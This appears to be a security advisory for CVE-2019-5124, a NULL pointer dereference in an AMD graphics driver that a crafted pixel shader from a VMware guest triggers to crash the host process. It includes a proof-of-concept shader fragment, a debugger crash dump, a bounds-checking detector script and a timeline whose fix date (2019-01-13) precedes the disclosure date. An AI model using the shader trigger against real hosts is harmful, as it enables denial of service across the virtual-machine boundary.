CVE-2019-5124
An exploitable out-of-bounds read vulnerability exists in the AMD ATIDXX64.DLL driver, version 26.20.13001.50005. A specially crafted pixel shader can cause a denial of service. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from a VMware guest, affecting the VMware host.
AMD ATIDXX64.DLL (26.20.13001.50005) running on Radeon RX 550 / 550 Series, VMware Workstation 15 (15.1.0 build-13591040) with Windows 10 x64 as guest VM
http://amd.com http://vmware.com
8.6 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
CWE-476: NULL Pointer Dereference
This vulnerability can be triggered by supplying a malformed pixel shader (inside the VMware guest OS). Such an attack can be triggered from VMware guest user mode to cause a NULL pointer dereference in the vmware-vmx.exe process on the host, or theoretically through WebGL (a remote website).
The DCL_CONSTANT_BUFFER instruction declares a shader constant buffer, cbN[size], where N is an integer that denotes the constant-buffer register number, and size is an integer that denotes the number of elements in the buffer. By modifying the shader instruction operand (in the DIV instruction) so that it references an element outside of the declared buffer, it is possible to cause a NULL pointer dereference.
Example shader:
ps_4_0
00000000: dcl_constant_buffer cb0[2].xyzw, immediateIndexed
00000001: customdata
00000002: dcl_input_ps_siv constant v0.xyzw, position
00000003: dcl_output o0.xyzw
00000004: dcl_temps 8
...
00000011: div r4.x, l(1, 1, 1, 1), cb0[65199].yyyy
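As an added illustration (not part of the advisory and not AMD or VMware code), the check below walks a disassembled shader, records every dcl_constant_buffer cbN[size] declaration, and flags any immediate cbN[index] operand that lies outside the declared range or names an undeclared buffer, which is exactly the condition the example above triggers. The sample input is a constructed copy of the advisory's disassembly fragment.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the disassembly fragment from the advisory, with the
# out-of-range cb0[65199] operand on the div instruction.
SAMPLE_SHADER = """\
ps_4_0
00000000: dcl_constant_buffer cb0[2].xyzw, immediateIndexed
00000001: customdata
00000002: dcl_input_ps_siv constant v0.xyzw, position
00000003: dcl_output o0.xyzw
00000004: dcl_temps 8
00000011: div r4.x, l(1, 1, 1, 1), cb0[65199].yyyy
"""

DECL_RE = re.compile(r"\bdcl_constant_buffer\s+cb(\d+)\[(\d+)\]")
# Only immediate (numeric) indices are checked; dynamically indexed operands
# such as cb0[r1.x] cannot be validated statically and need a runtime clamp.
REF_RE = re.compile(r"\bcb(\d+)\[(\d+)\]")


def check_constant_buffer_refs(disasm: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, operand, reason) for every immediate cbN[i] operand
    whose index is outside the declared buffer, or whose buffer was never
    declared. An empty list means all immediate references are in range."""
    sizes: Dict[int, int] = {}  # constant-buffer register -> declared element count
    findings: List[Tuple[int, str, str]] = []
    for line_no, raw in enumerate(disasm.splitlines(), 1):
        line = raw.strip()
        decl = DECL_RE.search(line)
        if decl:
            sizes[int(decl.group(1))] = int(decl.group(2))
            continue
        for ref in REF_RE.finditer(line):
            reg, idx = int(ref.group(1)), int(ref.group(2))
            if reg not in sizes:
                findings.append((line_no, ref.group(0), "cb%d is never declared" % reg))
            elif idx >= sizes[reg]:
                findings.append((line_no, ref.group(0),
                                 "index %d outside cb%d[%d]" % (idx, reg, sizes[reg])))
    return findings


if __name__ == "__main__":
    for line_no, operand, reason in check_constant_buffer_refs(SAMPLE_SHADER):
        print("line %d: %s: %s" % (line_no, operand, reason))
```

A host-side shader translator that applied this kind of bounds check before compiling guest-supplied bytecode would reject the shader instead of reaching the NULL source pointer in the memcpy shown below.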
NULL pointer dereference during memcpy operation (source argument is NULL):
0:015> .ecxr
rax=0000025be3f2c010 rbx=0000000000000010 rcx=00000000000a0000
rdx=fffffda41c0d3ff0 rsi=0000000000000000 rdi=0000025be3f2c010
rip=00007ffebb6718f7 rsp=000000f1551f9008 rbp=000000f1551f9078
r8=00000000000a0000 r9=0000000000000000 r10=0000000000000000
r11=0000000000000001 r12=000000f1551f9038 r13=00000000000025f8
r14=0000025be3f2c010 r15=0000000000000002
iopl=0 nv up ei pl nz na pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010203
atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x96da7:
00007ffe`bb6718f7 f3a4 rep movs byte ptr [rdi],byte ptr [rsi]
0:015> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for amdihk64.dll
KEY_VALUES_STRING: 1
Key : AV.Dereference
Value: NullPtr
Key : AV.Fault
Value: Read
Key : Analysis.CPU.Sec
Value: 0
Key : Analysis.DebugAnalysisProvider.CPP
Value: Create: 8007007e on CLAB
Key : Analysis.DebugData
Value: CreateObject
Key : Analysis.DebugModel
Value: CreateObject
Key : Analysis.Elapsed.Sec
Value: 16
Key : Analysis.Memory.CommitPeak.Mb
Value: 132
Key : Analysis.System
Value: CreateObject
Key : Timeline.Process.Start.DeltaSec
Value: 542
APPLICATION_VERIFIER_FLAGS: 0
CONTEXT: (.ecxr)
rax=0000025be3f2c010 rbx=0000000000000010 rcx=00000000000a0000
rdx=fffffda41c0d3ff0 rsi=0000000000000000 rdi=0000025be3f2c010
rip=00007ffebb6718f7 rsp=000000f1551f9008 rbp=000000f1551f9078
r8=00000000000a0000 r9=0000000000000000 r10=0000000000000000
r11=0000000000000001 r12=000000f1551f9038 r13=00000000000025f8
r14=0000025be3f2c010 r15=0000000000000002
iopl=0 nv up ei pl nz na pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010203
atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x96da7:
00007ffe`bb6718f7 f3a4 rep movs byte ptr [rdi],byte ptr [rsi]
Resetting default scope
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffebb6718f7 (atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x0000000000096da7)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000
PROCESS_NAME: vmware-vmx.exe
READ_ADDRESS: 0000000000000000
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 0000000000000000
STACK_TEXT:
000000f1`551f9008 00007ffe`bb53f171 : 00000000`00000003 00000000`00000010 00000000`000a0000 00000000`00000001 : atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x96da7
000000f1`551f9010 00007ffe`bb53ed84 : 000000f1`551f9160 0000025b`ee479120 0000025b`e38899d0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7c4ea1
000000f1`551f90b0 00007ffe`bb520cac : 00000000`00000000 000000f1`551f9210 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7c4ab4
000000f1`551f9110 00007ffe`bb51f6af : 0000025b`e3856520 000000f1`00000001 000000f1`551f9380 0000025b`de870150 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a69dc
000000f1`551f92c0 00007ffe`bb504dab : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a53df
000000f1`551f9430 00007ffe`bb5048e2 : 00000000`00000000 0000025b`e3856520 0000025b`e2ba4960 000000f1`551fd140 : atidxx64!AmdDxGsaFreeCompiledShader+0x78aadb
000000f1`551f9490 00007ffe`bb535303 : 0000025b`e3856520 00000000`00000000 0000025b`de85a6d0 000000f1`551fd140 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a612
000000f1`551fd0f0 00007ffe`bb5047b7 : 00000000`0000023c 0000025b`e37f3f80 0000025b`de884c30 0000025b`de851970 : atidxx64!AmdDxGsaFreeCompiledShader+0x7bb033
000000f1`551fd120 00007ffe`bb5d4351 : 00000000`00000000 000000f1`551fd460 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a4e7
000000f1`551fd180 00007ffe`bad94cca : 00000000`00000000 00000000`00000000 000000f1`551fd460 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x85a081
000000f1`551fd1c0 00007ffe`bad94b13 : 0000025b`e2ba8560 00000000`00000003 00000000`00000003 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a9fa
000000f1`551fd200 00007ffe`bad1c05e : 00000000`00000001 00000000`00000000 0000025a`54f80434 00007ffe`00000003 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a843
000000f1`551fd290 00007ffe`bb488176 : 00000000`00000000 000000f1`551fd460 00000000`00000000 ffffffff`ffffffff : atidxx64!XdxQueryTlsLookupTable+0x6d6e
000000f1`551fd2d0 00007ffe`bad2d8b1 : 0000025b`e4b46f48 0000025b`e4c9571c 0000025b`e443c390 00000000`00000001 : atidxx64!AmdDxGsaFreeCompiledShader+0x70dea6
000000f1`551fd440 00007ffe`d0cf8ecc : 00000000`00000000 000000f1`551fd670 0000025b`e4b46f38 00007ffe`d77fba17 : atidxx64!XdxQueryTlsLookupTable+0x185c1
000000f1`551fd570 00007ffe`d0d0294f : 000000f1`00000001 0000025b`e44387a8 0000025b`e4b46f38 0000025b`e442e890 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
000000f1`551fd7d0 00007ffe`d0d0288a : 000000f1`551fdeb0 00007ffe`d0eb2388 0000025b`e4b46de0 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
000000f1`551fd860 00007ffe`d0ceee48 : 0000025b`e4b46e28 000000f1`551fdeb0 000000f1`551fdee0 00007ffe`d0eb2388 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
000000f1`551fd8c0 00007ffe`d0cfb16d : 00000000`00000000 0000025b`e4b46de0 00000000`00000000 0000025a`54f80000 : d3d11!CDevice::CreateLayeredChild+0xc88
000000f1`551fdd00 00007ffe`d0cfb940 : 0000025b`e4b46de0 00000000`00000009 00000000`00000188 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
000000f1`551fde70 00007ffe`d0ce14f4 : 0000025b`e43d7d30 00000000`00000009 0000025b`e4c95680 0000025b`e43d8568 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
000000f1`551fe060 00007ffe`d0ce1463 : 0000025b`e4c95680 00000000`0000b000 000000f1`551fe349 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
000000f1`551fe0c0 00007ffe`d0ce11e8 : 0000025b`e43d8568 0000025b`e4c95680 00000000`00000548 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
000000f1`551fe270 00007ff7`9e148af2 : 0000025b`e4ee0040 00007ff7`9de90000 0000025b`e43d8568 0000025b`e468d490 : d3d11!CDevice::CreatePixelShader+0x28
000000f1`551fe2c0 00007ff7`9e14a3d5 : 0000025b`e4ee0040 00007ff7`9de90000 00007ff7`9de90000 0000025b`de670cc0 : vmware_vmx+0x2b8af2
000000f1`551fe3b0 00007ff7`9e149252 : 0000025b`e4ee7fc0 00007ff7`9de90000 0000025b`e4ee0040 0000025b`e4ee0040 : vmware_vmx+0x2ba3d5
000000f1`551ff400 00007ff7`9e145741 : 00000000`fffe4000 0000025b`e4ee0040 00000000`00000003 0000025b`e4c86690 : vmware_vmx+0x2b9252
000000f1`551ff450 00007ff7`9e0a1af9 : 00007ff7`9e0a1a30 0000025b`e4c86680 00000000`00000028 00007ff7`9e184120 : vmware_vmx+0x2b5741
000000f1`551ff490 00007ff7`9e032ad2 : 00000000`00000020 00007ff7`9e0a1a30 000000f1`551ff5f0 00000000`00000028 : vmware_vmx+0x211af9
000000f1`551ff4f0 00007ff7`9e030b9f : 000000f1`551ff710 00000000`00000020 00000000`00000000 00000000`00000001 : vmware_vmx+0x1a2ad2
000000f1`551ff6b0 00007ff7`9df865c0 : 0000025a`58aa0600 0000025a`58aa06e0 00000000`00000001 00000000`00000000 : vmware_vmx+0x1a0b9f
000000f1`551ff6e0 00007ff7`9e4ac800 : 00007ff7`9df864a0 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf65c0
000000f1`551ff730 00007ffe`d73b7bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61c800
000000f1`551ff7c0 00007ffe`d782cee1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
000000f1`551ff7f0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
SYMBOL_NAME: atidxx64!AmdLiquidVrD3D11WrapDeviceContext+96da7
MODULE_NAME: atidxx64
IMAGE_NAME: atidxx64.dll
STACK_COMMAND: ~15s ; .ecxr ; kb
FAILURE_BUCKET_ID: NULL_POINTER_READ_c0000005_atidxx64.dll!AmdLiquidVrD3D11WrapDeviceContext
OS_VERSION: 10.0.18362.1
BUILDLAB_STR: 19h1_release
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
FAILURE_ID_HASH: {0ce71f05-194d-c22e-2d78-ff6355a2ad32}
2019-10-23 - Vendor Disclosure
2019-01-13 - Vendor confirmed fix and no issues found on versions 15.5.1 with 20.1.1 AMD drivers
2020-01-21 - Public Release
Discovered by Piotr Bania of Cisco Talos.